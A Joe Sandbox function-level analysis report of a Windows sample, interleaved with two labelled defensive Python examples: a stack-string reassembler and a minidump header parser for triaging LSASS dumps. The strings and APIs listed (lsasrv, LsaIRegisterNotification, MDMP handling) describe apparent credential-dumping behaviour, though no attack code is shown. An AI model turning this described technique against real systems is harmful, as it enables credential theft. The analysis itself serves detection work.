                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                              • String ID:
                                              • API String ID: 3778485334-0
                                              • Opcode ID: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                              • Instruction ID: 8ac60b64c9aace67bcedab16713f3fcb5d53cdb6cfe2814f9412f25cafae8d3a
                                              • Opcode Fuzzy Hash: bf1be38ff80d1e36a91b635a4a1ce7a4a76762dc689d6be8787abb1f1a7dd809
                                              • Instruction Fuzzy Hash: 0F31C736909B8686EB949F15F84436A73A2FF85794F604135DA8DC3765EFBCE054CB00
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                              • String ID:
                                              • API String ID: 1239891234-0
                                              • Opcode ID: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                              • Instruction ID: 43345b458fd677ba2b91cf35573594db6ebea2ab0d3a42f72b589e7926733d6e
                                              • Opcode Fuzzy Hash: 5d36ba9e913c190f0612814cc419d9f76b2a0e889312af5377098d70428b273c
                                              • Instruction Fuzzy Hash: 71319233608BC286DBA4CF25E8406AE73A1FB88794F600235EA9D87B95DF7CD545CB00
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                              • API String ID: 2643518689-564504941
                                              • Opcode ID: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
                                              • Instruction ID: 53912150e2a677e1249f2cdb36dd1f322e179e2fba9d6dccbd950604d6631611
                                              • Opcode Fuzzy Hash: f00bcf87bbbb1d6e6682388d77f3276f0af41bfeee020ad42ad2caa498c19714
                                              • Instruction Fuzzy Hash: AF510922A1AB0382FE999F22B85417437A2AF45BC4F640135CD0EC3764EFBCA489C342
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule$InitStringUnicode
                                              • String ID: Canc$LoadLibraryW$LocalAlloc$LsaI$LsaIRegisterNotification$cati$elNo$kernel32$lsasrv$tifi
                                              • API String ID: 3738668-3948219663
                                              • Opcode ID: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
                                              • Instruction ID: bd492f09635da7722a4863df79009bb3105a868c30bca9ba0f1c4f2a96bb878b
                                              • Opcode Fuzzy Hash: 5533f267b9be45899d6176bd6bf488175ef0c89ff780fd2f82d7aa3d472244e3
                                              • Instruction Fuzzy Hash: 29911B37B09B46DAEB84CF65E8406B837B2EB48788F600435CA0D97765DFB8E55AC340
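The String ID line of this entry lists, next to ordinary literals, five strings of exactly four characters (Canc, LsaI, cati, elNo, tifi). That is what a string assembled on the stack with 32-bit immediate stores looks like to a string extractor: one four-byte fragment per store, reported in sorted order rather than in memory order. The example below is added here and is not part of the sandbox report or the sample; it reorders such fragments against a small dictionary of lsasrv.dll export names (the dictionary is an assumption for the example). For the fragments in this entry it yields LsaICancelNotification, the counterpart of the LsaIRegisterNotification literal present in the same function.

```python
"""Reassemble a stack string from the 4-character fragments in a String ID list.

Added example, not part of the sandbox report. STRING_ID is copied from the
function entry above; CANDIDATES is an assumed dictionary of lsasrv.dll export
names used only for matching.
"""
from collections import Counter

# Copied from the report's String ID line ('$'-separated, alphabetically sorted).
STRING_ID = ("Canc$LoadLibraryW$LocalAlloc$LsaI$LsaIRegisterNotification"
             "$cati$elNo$kernel32$lsasrv$tifi")

# Assumed dictionary to match fragments against (example choice, not from the report).
CANDIDATES = ["LsaIRegisterNotification", "LsaICancelNotification",
              "LsaIFreeReturnBuffer"]

CHUNK = 4  # one 'mov dword [rsp+n], imm32' stores exactly four ANSI characters


def split_string_id(string_id):
    """The report joins a function's string literals with '$' and sorts them."""
    return string_id.split("$")


def fragments(strings, chunk=CHUNK):
    """Strings of exactly `chunk` characters are the fragments of a stack-built
    string; longer entries are ordinary literals and are left alone."""
    return Counter(s for s in strings if len(s) == chunk)


def chunk_name(name, chunk=CHUNK):
    """Cut a candidate the way the compiler would when building it on the stack."""
    return [name[i:i + chunk] for i in range(0, len(name), chunk)]


def reassemble(string_id, candidates, chunk=CHUNK):
    """Return {candidate: fragments in memory order} for every candidate whose
    full-size chunks are all present in the fragment multiset. The final chunk,
    shorter than `chunk`, is NUL-padded in memory and usually falls below the
    extractor's minimum length, so it is not required to be present."""
    frags = fragments(split_string_id(string_id), chunk)
    hits = {}
    for name in candidates:
        full = [c for c in chunk_name(name, chunk) if len(c) == chunk]
        need = Counter(full)
        if all(frags[c] >= n for c, n in need.items()):
            hits[name] = full
    return hits


def unmatched_fragments(string_id, candidates, chunk=CHUNK):
    """Fragments no candidate accounts for: a cue that the dictionary is too small."""
    frags = fragments(split_string_id(string_id), chunk)
    used = Counter()
    for full in reassemble(string_id, candidates, chunk).values():
        used.update(full)
    return sorted((frags - used).elements())


if __name__ == "__main__":
    for name, parts in reassemble(STRING_ID, CANDIDATES).items():
        print(name, "<-", " + ".join(parts))
    print("unmatched:", unmatched_fragments(STRING_ID, CANDIDATES))
```

The full-length literal LsaIRegisterNotification does not match as a stack string (its chunks Regi, ster, Noti are absent), which is the expected result: only the name the author hid from plain string search was split. An empty unmatched list means every fragment in the entry is explained.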
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: FreeLocal$AddressHandleModuleProcwsprintf
                                              • String ID: %lS%lS%lS:%lS$WriteFile$kernel32
                                              • API String ID: 602150089-2677625405
                                              • Opcode ID: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                              • Instruction ID: b3a187d9394b159ef2f2e2872927c4fb946b80ddb49305ef08d2fd377f324a14
                                              • Opcode Fuzzy Hash: b11d8622920a2f47f9daaeab12ed3a5efb95e5e1c83adc421bcd68cf021e0860
                                              • Instruction Fuzzy Hash: BE516E67B09B42C2EA94AF12A80027A63A2FF84BC4F644535DD1E877B5DFBCE546C340
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FreeLocal
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3514375268-3502785670
                                              • Opcode ID: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                              • Instruction ID: bca11edbb77d07c85b6db9f513527b2abb69a1d06ff3223fe40fb32262cf047e
                                              • Opcode Fuzzy Hash: 16e864027eccf711ceb2599a8e25e6efffbb2f622ca0795a7aecc8477e6c70d0
                                              • Instruction Fuzzy Hash: 1A415337B18B4286EA949F16F8402396762FB88FD5F648535CE4E87354DEBDD849C300
                                              APIs
                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097530DE
                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097530EE
                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097531C2
                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF6097531D2
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF609753240
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,C0000225,?,00007FF609753032), ref: 00007FF609753249
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLocalModuleProc
                                              • String ID: KSSM$LocalAlloc$RUUU$kernel32
                                              • API String ID: 1697219777-2069434485
                                              • Opcode ID: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
                                              • Instruction ID: d1ded3ac3a031bc02b7ab06c8c0129994f2fc4ad546be93ab7e09a4f24516834
                                              • Opcode Fuzzy Hash: ff03697077344f23be60409640fc6f5bc2b2c84fe588a8c0b6027fdb40be19b8
                                              • Instruction Fuzzy Hash: 4C513B72B18B6296FB90CF62E8849AD77AAFB44BC8B544035DE0E83754EF78D545C700
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: File$HandleView$AddressCloseCreateMappingModuleProcUnmap
                                              • String ID: LocalAlloc$MDMP$kernel32
                                              • API String ID: 3734750734-1949004057
                                              • Opcode ID: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                              • Instruction ID: f38017962408edd2a8ec1b1f129fd580bac57c2828f44b0647f7be9039cb1f52
                                              • Opcode Fuzzy Hash: ac78767d471d2eb992b9a504df308e303ca546f5a398330820821f7f68a337da
                                              • Instruction Fuzzy Hash: 2D215E37A09A42C2EB95CF65E45067973A2FB88F85B68C235CA0D87B14EFBCD455C700
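The entry above pairs CreateFileMapping/MapViewOfFile/UnmapViewOfFile/CloseHandle with the string "MDMP", the signature of the Windows minidump format, which is consistent with code that opens a dump file and validates its header before walking it (the input that Mimikatz's sekurlsa::minidump mode expects). The following parser is an added example, not code from the report or from the sample: it validates the MINIDUMP_HEADER and stream directory as laid out in the Windows SDK (minidumpapiset.h) and flags files that carry a memory stream, which is the shape an LSASS dump takes. The sample dump bytes are constructed inline and are not data from the analysis.

```python
import struct
from typing import Dict, List

# MINIDUMP_HEADER, little-endian, from the Windows SDK (minidumpapiset.h):
# Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum,
# TimeDateStamp (union with Reserved), Flags (ULONG64)  -> 32 bytes
MINIDUMP_HEADER_FMT = "<IIIIIIQ"
MINIDUMP_HEADER_SIZE = struct.calcsize(MINIDUMP_HEADER_FMT)   # 32
# MINIDUMP_DIRECTORY: StreamType, Location.DataSize, Location.Rva -> 12 bytes
MINIDUMP_DIRECTORY_FMT = "<III"
MINIDUMP_DIRECTORY_SIZE = struct.calcsize(MINIDUMP_DIRECTORY_FMT)  # 12

MINIDUMP_SIGNATURE = 0x504D444D   # the bytes b"MDMP" read as a little-endian ULONG32
MINIDUMP_VERSION = 0xA793         # MINIDUMP_VERSION lives in the low 16 bits of Version

# Values from the MINIDUMP_STREAM_TYPE enumeration (only the ones used here)
STREAM_NAMES = {
    3: "ThreadListStream",
    4: "ModuleListStream",
    5: "MemoryListStream",
    6: "ExceptionStream",
    7: "SystemInfoStream",
    9: "Memory64ListStream",
}
MEMORY_STREAMS = {5, 9}


def parse_minidump(data: bytes) -> Dict[str, object]:
    """Validate the MDMP header and return timestamp, flags and the stream directory.

    Raises ValueError for anything that is not a well-formed minidump; every
    offset is bounds-checked against len(data) before it is dereferenced."""
    if len(data) < MINIDUMP_HEADER_SIZE:
        raise ValueError("shorter than a MINIDUMP_HEADER")
    (sig, version, n_streams, dir_rva, _checksum,
     timestamp, flags) = struct.unpack_from(MINIDUMP_HEADER_FMT, data, 0)
    if sig != MINIDUMP_SIGNATURE:
        raise ValueError(f"bad signature 0x{sig:08X}, expected 'MDMP'")
    if (version & 0xFFFF) != MINIDUMP_VERSION:
        raise ValueError(f"unexpected minidump version 0x{version & 0xFFFF:04X}")
    dir_end = dir_rva + n_streams * MINIDUMP_DIRECTORY_SIZE
    # The directory must not overlap the header or run past end of file.
    if dir_rva < MINIDUMP_HEADER_SIZE or dir_end > len(data):
        raise ValueError("stream directory outside the file")
    streams: List[Dict[str, object]] = []
    for i in range(n_streams):
        stype, size, rva = struct.unpack_from(
            MINIDUMP_DIRECTORY_FMT, data, dir_rva + i * MINIDUMP_DIRECTORY_SIZE)
        if rva + size > len(data):
            raise ValueError(f"stream {i} (type {stype}) extends past end of file")
        streams.append({"type": stype,
                        "name": STREAM_NAMES.get(stype, f"Stream{stype}"),
                        "rva": rva, "size": size})
    return {"timestamp": timestamp, "flags": flags, "streams": streams}


def looks_like_memory_dump(data: bytes) -> bool:
    """True when data is a valid minidump that carries process memory
    (MemoryListStream or Memory64ListStream), the shape of an LSASS dump."""
    try:
        parsed = parse_minidump(data)
    except ValueError:
        return False
    return any(s["type"] in MEMORY_STREAMS for s in parsed["streams"])


def build_sample_dump() -> bytes:
    """Constructed test input: header, a two-entry directory and two placeholder
    stream bodies (SystemInfoStream, Memory64ListStream). Not a real dump."""
    n = 2
    dir_rva = MINIDUMP_HEADER_SIZE                      # directory right after the header
    body_rva = dir_rva + n * MINIDUMP_DIRECTORY_SIZE    # 56
    sysinfo = bytes(56)                                 # placeholder SystemInfoStream body
    mem64 = bytes(16)                                   # placeholder Memory64ListStream body
    header = struct.pack(MINIDUMP_HEADER_FMT, MINIDUMP_SIGNATURE, MINIDUMP_VERSION,
                         n, dir_rva, 0, 0x66500000, 0)
    directory = (struct.pack(MINIDUMP_DIRECTORY_FMT, 7, len(sysinfo), body_rva) +
                 struct.pack(MINIDUMP_DIRECTORY_FMT, 9, len(mem64), body_rva + len(sysinfo)))
    return header + directory + sysinfo + mem64


SAMPLE_DUMP = build_sample_dump()
SAMPLE_NOT_A_DUMP = b"MZ" + bytes(62)   # constructed: a PE-like prefix, not a minidump

if __name__ == "__main__":
    for s in parse_minidump(SAMPLE_DUMP)["streams"]:
        print(f"{s['name']:<20} rva=0x{s['rva']:X} size={s['size']}")
    print("memory dump:", looks_like_memory_dump(SAMPLE_DUMP))
```

Run against a suspicious file on disk (for example anything written by a process that opened a handle to lsass.exe), `looks_like_memory_dump(open(path, "rb").read())` gives a cheap triage verdict before the file is handed to a full minidump parser; the bounds checks matter because an attacker-controlled dump is untrusted input to the tooling as well.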
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                              • String ID: m*H$m*H$m*H$m*H
                                              • API String ID: 27599310-229035250
                                              • Opcode ID: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                              • Instruction ID: 38f0f939668f34c6b05be63ba5bcfd795a4a55d24ef12f9d8daece608addf946
                                              • Opcode Fuzzy Hash: d1aff7f8dd491d9a2af4ff98f426b5defa286991a079765ade965f3974373ef1
                                              • Instruction Fuzzy Hash: E6515973E0C68287FAE98F15A4802BA66A3EB847C0F744535D94EC2794CFBCE845C202
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756D2A
                                              • malloc.LIBCMT ref: 00007FF609756D93
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756DC7
                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756DEE
                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756E36
                                              • malloc.LIBCMT ref: 00007FF609756E93
                                                • Part of subcall function 00007FF609758CD4: _FF_MSGBANNER.LIBCMT ref: 00007FF609758D04
                                                • Part of subcall function 00007FF609758CD4: HeapAlloc.KERNEL32(?,?,00000000,00007FF6097574D0,?,?,?,00007FF609757395,?,?,?,00007FF60975743F), ref: 00007FF609758D29
                                                • Part of subcall function 00007FF609758CD4: _callnewh.LIBCMT ref: 00007FF609758D42
                                                • Part of subcall function 00007FF609758CD4: _errno.LIBCMT ref: 00007FF609758D4D
                                                • Part of subcall function 00007FF609758CD4: _errno.LIBCMT ref: 00007FF609758D58
                                              • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756EC8
                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF609756FCD), ref: 00007FF609756F08
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiStringWide$_errnomalloc$AllocHeap_callnewh
                                              • String ID:
                                              • API String ID: 3905601649-0
                                              • Opcode ID: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                              • Instruction ID: b4942dd6159699f786f13c0730bc7f6877c0a8b494a0c7b25dfdd270146f6da7
                                              • Opcode Fuzzy Hash: 2ff4a7507a82664706b41ccc9cbd6ec1c06fa3633e00bf2ef3564a6fd6ba3400
                                              • Instruction Fuzzy Hash: 4C81C533B0978286EBA48F25D84026976D6FF48BE4FA44635EA1D87BD4DFBCE5018700
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockmalloc
                                              • String ID:
                                              • API String ID: 2923989369-0
                                              • Opcode ID: bc655189494912a802cf5939326c0831d488f45ff90a1d662128a5e15a8b38dc
                                              • Instruction ID: 4c14b84f1e0866868846964341ea2e1aed4ced205fb5243cc4e7a9d5526bfd98
                                              • Opcode Fuzzy Hash: bc655189494912a802cf5939326c0831d488f45ff90a1d662128a5e15a8b38dc
                                              • Instruction Fuzzy Hash: 31214C23E0968282F6D9AF21E44477E6666EF817D4F644534E94EC67D2CFBCE9408350
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FreeLocal$FileMemoryPointerProcessWrite
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3690204003-3502785670
                                              • Opcode ID: bfe815200edb62b6d5542a813ca1b1f70e712d92eb9977d59844b44778e0b4c3
                                              • Instruction ID: c37b6fbc8525fb249a71727be3664c3e7f055f138aeb222b04f17003c8f07e7d
                                              • Opcode Fuzzy Hash: bfe815200edb62b6d5542a813ca1b1f70e712d92eb9977d59844b44778e0b4c3
                                              • Instruction Fuzzy Hash: C0312433A08B46C9EB90CF61E8401AC33B5FB487C8B544935DA4D97BA8EFB8E554C740
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLocalModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 1697219777-3502785670
                                              • Opcode ID: cb2947bb03def20f4983750d2723422282199711071f6f6c57adc94798bf4ce7
                                              • Instruction ID: c465955e6435367959681cf19875337b5a19d938c97e4590b56f9685121b0940
                                              • Opcode Fuzzy Hash: cb2947bb03def20f4983750d2723422282199711071f6f6c57adc94798bf4ce7
                                              • Instruction Fuzzy Hash: C131F763A19B0695FB80DF65E8843B823A6BB487C8F640535CA1C93764EFBCE555C710
                                              APIs
                                              • DecodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF609758639
                                              • DecodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF609758649
                                                • Part of subcall function 00007FF60975910C: _errno.LIBCMT ref: 00007FF609759115
                                                • Part of subcall function 00007FF60975910C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF609759120
                                              • EncodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF6097586C7
                                                • Part of subcall function 00007FF6097575A4: realloc.LIBCMT ref: 00007FF6097575CF
                                                • Part of subcall function 00007FF6097575A4: Sleep.KERNEL32(?,?,00000000,00007FF6097586B7,?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A), ref: 00007FF6097575EB
                                              • EncodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF6097586D7
                                              • EncodePointer.KERNEL32(?,?,?,00007FF609758725,?,?,?,?,00007FF60975598A,?,?,?,00007FF6097544D4), ref: 00007FF6097586E4
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmp
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                              • String ID:
                                              • API String ID: 1909145217-0
                                              • Opcode ID: e41475865cdc026077d39e2ccd95283321267069a2bcd4671505f549074d287f
                                              • Instruction ID: 451411fbce285edd9a52ee85c006ef07897ebfab9190935c0f9a2365ec0d9568
                                              • Opcode Fuzzy Hash: e41475865cdc026077d39e2ccd95283321267069a2bcd4671505f549074d287f
                                              • Instruction Fuzzy Hash: E4217F62B0A743C2EB849F62E9480A963A2FF44BD0F644435D90DC775AEEBCE485C345
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
